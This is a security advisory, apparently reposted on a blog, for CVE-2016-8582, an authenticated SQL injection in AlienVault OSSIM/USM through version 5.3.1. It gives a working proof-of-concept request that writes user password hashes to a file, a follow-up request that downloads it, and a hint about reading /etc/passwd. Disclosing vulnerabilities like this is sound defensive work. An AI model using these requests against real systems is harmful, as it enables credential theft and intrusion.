Details=======Product: Alienvault OSSIM/USMVulnerability: SQL InjectionAuthor: Peter Lapp, lappsec () gmail comCVE: CVE-2016-8582Vulnerable Versions: <=5.3.1Fixed Version: 5.3.2Vulnerability Details=====================A SQL injection vulnerability exists in the value parameter of/ossim/dashboard/sections/widgets/data/gauge.php on line 231. Bysending a serialized array with a SQL query in the type field, it'spossible to execute an arbitrary SQL query. The result is notdisplayed on the screen, but it can be exploited as a blind SQLi orhave the output directed to a file and then retrieved via anotherrequest. Authentication is required.POC===This request will dump user password hashes to a file:/ossim/dashboard/sections/widgets/data/gauge.php?&type=alarm&wtype=blah&asset=1&height=1&value=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F10.0.0.123_pass_tshark.pcap%27--+-%22%3B%7DThe file containing the output can then be retrieved with the following request:/ossim/pcap/download.php?scan_name=pass&sensor_ip=10.0.0.123It's also possible to read the contents of any file readable by themysql user by using mysql's load_file function. For example, changingthe request to something like select load_file('/etc/passwd') .Timeline========08/03/16 - Reported to Vendor10/03/16 - Fixed in version 5.3.2References==========https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
0 komentar:
Post a Comment
I just a newbie and student, don't using this article for criminal